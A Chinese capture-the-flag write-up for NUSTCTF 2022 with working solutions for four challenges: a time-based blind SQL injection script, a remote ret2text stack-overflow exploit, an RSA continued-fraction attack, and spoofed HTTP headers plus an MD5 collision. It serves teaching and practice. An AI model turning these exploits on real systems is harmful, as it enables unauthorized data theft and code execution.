# NUSTCTF(校外赛道)2022-wp

题目复现环境:
https://www.ctfer.vip/contest/62/
http://47.103.60.98/

访问时,提供了一个”查询”按钮。点击,进入查询结果页面。

http://47.103.60.98/index.php?sort=desc

id: 2 - 姓名: Bob - 籍贯: 江苏无锡
id: 4 - 姓名: Tom - 籍贯: 江苏常州
id: 1 - 姓名: Alice - 籍贯: 江苏南京
id: 5 - 姓名: Mary - 籍贯: 江苏南京
id: 6 - 姓名: Allen - 籍贯: 江苏南京

发现链接末尾是desc,猜测是order by xx desc这样的查询语句。

FUZZ一下SQL关键字,过滤的关键字不多。

过滤的有:空格

经尝试,发现存在基于时间的SQL注入漏洞:页面对真/假条件没有回显差异,只能用 sleep() 造成的响应延迟作为判断条件。由于只过滤了空格,用 /**/ 代替空格即可绕过。注意:直接把 `#` 拼接进 URL 时,requests(以及浏览器)会把 `#` 之后的内容当作 URL fragment 而不发送给服务端,稳妥的做法是写成 `%23` 或对整个参数值做 URL 编码。exp脚本如下:

import requests

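burp0_url = "http://47.103.60.98/index.php?sort="
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0",
                 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                 "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                 "Accept-Encoding": "gzip, deflate",
                 "Content-Type": "application/x-www-form-urlencoded",
                 }
# Candidate characters, tried in this order for every position.  Space is
# deliberately absent (the target filters it).  The original literal used the
# invalid escape "\]" (a SyntaxWarning on modern Python); "\\]" is the same
# two characters written correctly.
all_print_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;?@[\\]^_`{|}~"

# Seconds the injected IF() sleeps on a correct guess; a response that takes at
# least this long is treated as "true".  Network jitter can still cause a false
# positive, so keep this comfortably above the normal round-trip time.
SLEEP_SECONDS = 1
# Upper bound on the number of characters to extract.
MAX_LENGTH = 40


def build_payload(position, char_code, delay=SLEEP_SECONDS):
    """Return the `sort` parameter value for one time-based oracle query.

    The page appears to build `ORDER BY <sort>`; appending `,IF(...)` adds a
    second sort expression that is evaluated only for its side effect.  The
    target strips spaces, so `/**/` is used as the token separator.  The
    trailing `#` comments out anything the application appends after the
    parameter.

    Args:
        position: 1-based index into the extracted string (MySQL MID()).
        char_code: ASCII code to compare the character at `position` with.
        delay: seconds to sleep when the comparison holds.
    """
    subquery = "(select/**/group_concat(name,position)/**/from/**/position/**/where/**/id=3)"
    return "desc,if(ascii(mid({q},{pos},1))={code},sleep({delay}),0)#".format(
        q=subquery, pos=position, code=char_code, delay=delay)


def probe(position, char_code, delay=SLEEP_SECONDS):
    """Send one oracle query; return True if the server slept (guess was right).

    The payload is fully percent-encoded before being appended to the URL: a
    raw `#` would otherwise be treated as a URL fragment by requests and never
    reach the server.  A timeout is set so a dead target cannot hang the loop.
    """
    from urllib.parse import quote
    payload = build_payload(position, char_code, delay)
    resp = requests.get(burp0_url + quote(payload, safe=""),
                        headers=burp0_headers, timeout=delay + 10)
    # elapsed measures time to the response headers, which is what sleep() delays.
    return resp.elapsed.total_seconds() >= delay


def extract(max_length=MAX_LENGTH, alphabet=all_print_str, delay=SLEEP_SECONDS):
    """Extract the secret character by character; return what was recovered.

    Stops early at the first position where no candidate matches (end of the
    string, or a character outside `alphabet`).  Stops trying further
    candidates as soon as one position is resolved, which both halves the
    average request count and avoids appending a second, jitter-induced match.
    """
    found = []
    for position in range(1, max_length + 1):
        print(position, end='')
        for ch in alphabet:
            if probe(position, ord(ch), delay):
                found.append(ch)
                print("".join(found))
                break
        else:
            # No candidate matched at this position: nothing more to read.
            break
    return "".join(found)


# Kept for callers that read the module-level result; populated when run as a script.
query_str = ''
if __name__ == "__main__":
    query_str = extract()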

64位程序,先IDA逆向分析源代码:

/*
 * Decompiled main() of the 64-bit pwn target (IDA output, lightly annotated).
 *
 * Two facts drive the exploit:
 *  - gets() imposes no length limit, so input longer than v4 overwrites the
 *    saved rbp and then the return address (classic stack overflow).
 *  - The flag branch is dead code: v4[0] is a char, so v4[0] % 233 lies in
 *    the open range (-233, 233) and can never equal 233.  system("cat flag")
 *    is therefore reachable only by returning into it (ret2text).
 *
 * NOTE(review): the decompiler's v4[10] may not reflect the exact frame
 * layout; the exploit below uses 10 + 8 bytes before the return address.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[10];                          /* stack buffer that gets() overflows */

  setbuf(_bss_start, 0LL);              /* presumably stdout, made unbuffered */
  puts("Your name plz:");
  gets(v4);                             /* unbounded read: the vulnerability */
  if ( v4[0] % 233 == 233 )             /* never true for a char, see above */
    system("cat flag");
  printf("Can you hack me? %s\n", v4);
  return 0;
}

gets存在栈溢出漏洞,可修改返回地址至 system("cat flag") 代码处,ret2text。偏移为 10 字节缓冲区 + 8 字节保存的 rbp = 18 字节,之后紧跟要跳转的地址。若远程在 system() 内部崩溃(常见原因是栈未 16 字节对齐触发 movaps 异常),可在目标地址之前先放一个 ret gadget 调整对齐。

exp:

from pwn import *

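# Address of the `system("cat flag")` code inside main (taken from the disassembly).
sys_addr = 0x401229
# Bytes from the start of v4 to the saved return address: the 10-byte buffer
# plus the 8-byte saved rbp.
RET_OFFSET = 10 + 8


def build_payload(target, offset=RET_OFFSET):
    """Return the ret2text payload: `offset` filler bytes then `target` as a little-endian qword.

    Pure stdlib so it can be checked offline; equivalent to
    b'A' * offset + p64(target) in pwntools terms.

    Args:
        target: 64-bit address to overwrite the return address with.
        offset: number of filler bytes before the return address.
    """
    return b'A' * offset + target.to_bytes(8, "little")


if __name__ == "__main__":
    context.log_level = 'debug'
    io = remote("43.143.7.97", 28859)
    # NOTE(review): if the target crashes inside system() (stack not 16-byte
    # aligned -> movaps fault), prepend a `ret` gadget address before sys_addr.
    pl1 = build_payload(sys_addr)
    io.sendlineafter(b"Your name plz:", pl1)
    io.interactive()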

chall.py

from Crypto.Util.number import getPrime, bytes_to_long
from sympy import nextprime
from secret import flag

# Challenge generator.  The weakness: p2 is derived from p1 by adding only a
# 600-bit value, so p1 and p2 (2048 bits) agree in their high ~1448 bits and
# N1/N2 = (p1/p2)^2 * q1/q2 is an extremely close approximation of q1/q2.
p1 = getPrime(2048)
q1 = getPrime(600)
# p2 = next prime after p1 + (600-bit random); p2/p1 is roughly 1 + 2^-1448.
p2 = nextprime(p1 + getPrime(600))
q2 = getPrime(600)

e = 0x10001

# Moduli of the form p^2 * q rather than plain p * q; phi(N) = p * (p - 1) * (q - 1).
N1 = p1 * p1 * q1
N2 = p2 * p2 * q2

print("N1 =", N1)
print("N2 =", N2)

# The flag is split into two halves, each encrypted under one modulus.
flag1 = bytes_to_long(flag[:len(flag) // 2])
flag2 = bytes_to_long(flag[len(flag) // 2:])

cipher1 = pow(flag1, e, N1)
cipher2 = pow(flag2, e, N2)

print("cipher1 =", cipher1)
print("cipher2 =", cipher2)

由于 p2 = nextprime(p1 + 600位随机数),p1 与 p2 只在低 600 位左右有差异,而它们本身是 2048 位,因此 N1/N2 = p1²q1/(p2²q2) ≈ q1/q2,且误差远小于 1/(2·q2²),所以 q1/q2 必然出现在 N1/N2 的连分数渐近分数中。逐个渐近分数试除 N1 即可求出 q1, q2,再对 N/q 开平方得到 p1, p2。

from Crypto.Util.number import *
from gmpy2 import *

# Challenge output.  N1 = p1^2 * q1, N2 = p2^2 * q2 with p1 ~ p2 (see chall.py);
# c1, c2 are the two flag halves encrypted under N1 and N2 respectively.
N1 = 3289746385054724131365721020639496300945479666755005407239362220435929471663971559131973068094267242759747682915202602265269024546168034070348080432976135403371083936361236868186476392365554734516698695915807318328547349333450125215426536032220967810893464208090339137598724593917266763998037725309967496052803477931961681761135080900299333158097292389350335121611775110493009954911832572636099153354952171029044016319029661601727739828271424563980850243898202779669776639104067478441675153857040164775196713586656673764171877161326751846236980454659960530174960321852298270258312146241360929350418220172331956030775384681767932014061291168620965347842124549316096247113770711834360498936747471888481237404034471246978342020816271785925362208839937490625070051801028223342083281773366267363149243726101075926327550718757413133631119649782144511080448476370411156544146278468602957599519708203511203435394861053372096309444985117323976240925612725880016576029876493825989064619463226166401883310383733295274652092903872304933657343307118616812213637906513530016004460475073291823916649597185291734261926576108675712303422832460766980003743958182130150811173621769221262799069912858162405156365709344847558244669016188305691537672753134766406649385330682157984720023661279153645005631349488537261911860571171672813544726579872640486753312665928030263533489558821140031095492111373847722540582741061909831250761476687
N2 = 2292263744571677490370198515319050673022350367021940229132415885393214523108231545410288799524823682686607005535541881885794949322622162858593875970155712564868530006799557973311000615581843236548539733075504282834631939435260232339940338468890310925405870533590386398071667718507612723307978025099102004513584485422609923041107028535400446355591432930994813185411831860201820145983435091523773691560011687528125877698679841462745728326159525372061320952493949821495222248383893254880735838359120880431072244214361010867779059178282739912365087421904643477215607290679708352033106358356290644004853543174075195107627794359272018100648168661860452919746052205404895413998960327066611970768862624073581670828267510841602161728589913841163473811894218339948715205301321356774629578043062238684103507006315521103670400509643518854842374093509082331379305822049420033746124157212615698602544129110388591266923967512746018551734391176602223771675279723873630468099034521371667295520830509224068753383327420799595674898227670628881521095495898465890256628288779785408613688721508315026743250146090703141554141208186588758560579281631449476819201739513661261100456398775274335050320480934180632543242116316388750179657345282978014879818574111951053767465935985181195234991374892341383106554664200986728169474150302232887629401491764905429656980077385228539526682528035467486946883267941678859904770170914569949948781798383
c1 = 758346536265430423952822486066685295768780904671958564513706915003627653309986327906604310025557676880130150973194443591153899441660221125085406078577489990064034099758898680250346992154199616929381594288918352701155172644054184374384778201304104144436102359709180739955762513436889301607686277088230852661148556440251553059814853050711377102806879036793210874472411397851504602916797481132018776755416068149801594219844674499351889997208649442043923826505239289470153001663639688739092310857881616013610569511757767780350165048282465256454770748877584119349207769812826840607665168961680724232789109312681055375411182858820698025923104994832566402422884359019460479145829812817446509615552819113705033128233093081687704471007797878802184788802106948491309583791881593217988561342681568377126606055476508381741342859362339824940846336741346126512500348868154174463810299929429409815515908136711497765026252563374327541491024303290989175383501994515761077240391195396083766760326143468930305986070405962303571534654392917816088220966950447926277802817335097304148972911332832248113849846752219065263639980629213197260594242031101803801865240157341309018859709063723920616432168289755151080828619642932516426139982777613526680161145782566883722320235485389839997229666979487071672091138823743231576011381309205283462045931376953038071401274899229258796970036565931730655471667545203734032609058125128632555918726761
c2 = 2281163375114595112593683220870779643793045914138930809669934728297504812745368657964524831965320392164027435706363680996214578180045485041532876049868691323690200562004954003143194397255512951717400899604307009993030792644670830602941543918898535970779253703220162651022293286208338299826844988619345629892007235258389532666376623514170628541968337364745860334903754371727427376399211310359996960626733244649671665175464666807399652951289553389561033148215888827057495743582318390507639029065358587166019110069479019692411629179363742708597061223484237748437654542910240974030049076975739481960903748359283570086571360417832776823264202688497555419017227144724790205424467059280453940666789219388347170532415234759731375390229140544207931837445265744016932142504371200121886182154284965893665022781184321216382767703694597553489507371271887593799060901908513758134472760311502510753557029741715193386673389466599068008750012915225818076301655694045130332321314233483042503950958442501013310465239137942770667655164906193219286435485452257047415797293472629254376873962168035382262951696816840667369861437088409243033239980128747965838367176274122593955221422537124546203553941387134587884149412499272660959871746858550851448840531698152805786123875121854564754397297726121984646669253047201515221545545683432754661774694401343486893270795112334494874407955432598253951220055000392855162417030953645428808146502304
e = 0x10001

def continuedFra(x, y):
    """Return the continued-fraction expansion of x/y as a list of partial quotients.

    Plain Euclidean algorithm: each step records floor(x/y) and continues with
    (y, x mod y) until the remainder is zero.  continuedFra(415, 93) -> [4, 2, 6, 7].
    """
    quotients = []
    while y != 0:
        q, r = divmod(x, y)
        quotients.append(q)
        x, y = y, r
    return quotients

def Simplify(ctnf):
    """Collapse a list of partial quotients into one fraction, folding from the back.

    Beware the return order: for [a0, a1, ..., ak] the pair returned is
    (den, num) of the convergent a0 + 1/(a1 + 1/(...)), e.g.
    Simplify([4, 2, 6, 7]) -> (93, 415) for the value 415/93.  wienerAttack's
    unpacking order relies on exactly this.  An empty list yields (0, 1).
    """
    pair = (0, 1)
    for quotient in ctnf[::-1]:
        pair = (pair[1], quotient * pair[1] + pair[0])
    return pair

def getit(c):
    """Return Simplify() of every proper prefix of c (lengths 1 .. len(c) - 1).

    The full expansion (which reproduces the exact input ratio) is deliberately
    excluded, matching the original's range; only the approximations are wanted.
    """
    return [Simplify(c[:prefix_len]) for prefix_len in range(1, len(c))]

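def wienerAttack(n1, n2):
    """Recover (q1, q2) from n1 = p1^2 q1 and n2 = p2^2 q2 when p1 ~ p2.

    Despite the name this is not Wiener's small-d attack; it only shares the
    continued-fraction machinery.  Because p2 differs from p1 in far fewer bits
    than p1 has, n1/n2 is a very close approximation of q1/q2, so q1/q2 appears
    among the convergents of the continued fraction of n1/n2.  Each convergent
    is tested by trial division of n1.  Simplify() returns (den, num), hence
    the (cand_q2, cand_q1) unpacking order.

    Returns:
        (q1, q2) with q1 | n1 and q1 not in {0, 1}.

    Raises:
        ValueError: no convergent divides n1.  The original returned None here,
        which only surfaced later as a confusing TypeError on tuple-unpack.
    """
    for cand_q2, cand_q1 in getit(continuedFra(n1, n2)):
        # 0 would make the modulo fail; 1 trivially divides everything.
        if cand_q1 in (0, 1):
            continue
        if n1 % cand_q1 == 0:
            return cand_q1, cand_q2
    raise ValueError("no convergent of n1/n2 divides n1; moduli are not of the expected p^2*q shape")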

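# --- Solve driver -----------------------------------------------------------
# Recover q1, q2 from the continued fraction of N1/N2, then p = sqrt(N / q).
q1, q2 = wienerAttack(N1, N2)
print(isPrime(q1))
print(isPrime(q2))
print(q1, q2)
print(q1.bit_length())
print(q2.bit_length())
# N // q must be a perfect square p^2.  gmpy2.iroot returns (root, is_exact);
# the original discarded the flag, so a wrong q would only show up later as
# garbage plaintext or a UnicodeDecodeError far from the real cause.
p1, exact1 = iroot(N1 // q1, 2)
p2, exact2 = iroot(N2 // q2, 2)
if not (exact1 and exact2):
    raise ValueError("N // q is not a perfect square: the recovered q is wrong")
print(isPrime(p1))
print(isPrime(p2))
# phi(p^2 * q) = p * (p - 1) * (q - 1); e = 0x10001 must be invertible mod it.
d1 = inverse(e, p1 * (p1 - 1) * (q1 - 1))
d2 = inverse(e, p2 * (p2 - 1) * (q2 - 1))
m1 = pow(c1, d1, N1)
m2 = pow(c2, d2, N2)
# The flag was split in half at encryption time; print the halves back to back.
print(long_to_bytes(m1).decode(), end='')
print(long_to_bytes(m2).decode())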

来检验一下你的WEB基础知识吧

这题检测HTTP协议。使用Yakit的Web Fuzzer发包:

GET / HTTP/1.1
Host: 43.143.7.97:28086

-->
You must come from 127.0.0.1

加一个XFF头(服务端用客户端完全可控的 X-Forwarded-For 来判断“来源是否为本机”,这种访问控制本身就是可绕过的;后面要求的 Referer 同样由客户端随意指定):

GET / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1

-->
Have you just visited http://localhost/?

再加一个Referer:

GET / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1
Referer: http://localhost/

-->
You must use POST

改GET方法为POST方法:

--> Your posted username must be admin

再添加POST的数据:

POST / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded

username=admin

--> Your posted p1 and p2 must be different but have the same md5

MD5 碰撞绕过:p1 和 p2 是一对经典的 64 字节 MD5 碰撞消息(由 fastcoll 一类“相同前缀”碰撞攻击生成),两者只在个别字节上不同(如 %00 与 %02、U 与 %D5)但 MD5 完全相同。由于消息中含有 0x00 等不可打印字节,必须 URL 编码后提交。这里需要真实碰撞而不是 PHP 弱比较下 `0e` 开头字符串的“科学计数法”技巧,推测服务端使用的是严格比较(未验证源码)。

POST / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded

username=admin&p1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&p2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
-->
(响应头中出现)Set-Cookie: dinner=diet%20menu

I don' want to follow diet menu anymore, I want to have a big meal

添加Cookie:

POST / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded
Cookie: dinner=big%20meal

username=admin&p1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&p2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

-->
Oh, I'm satisfied, and this is your flag: NSSCTF{b62ea40a-37de-4437-b7d3-5da72bf44b00}

Original: https://blog.csdn.net/rickliuxiao/article/details/127826580
Author: jia9iniu
Title: # NUSTCTF(校外赛道)2022-wp
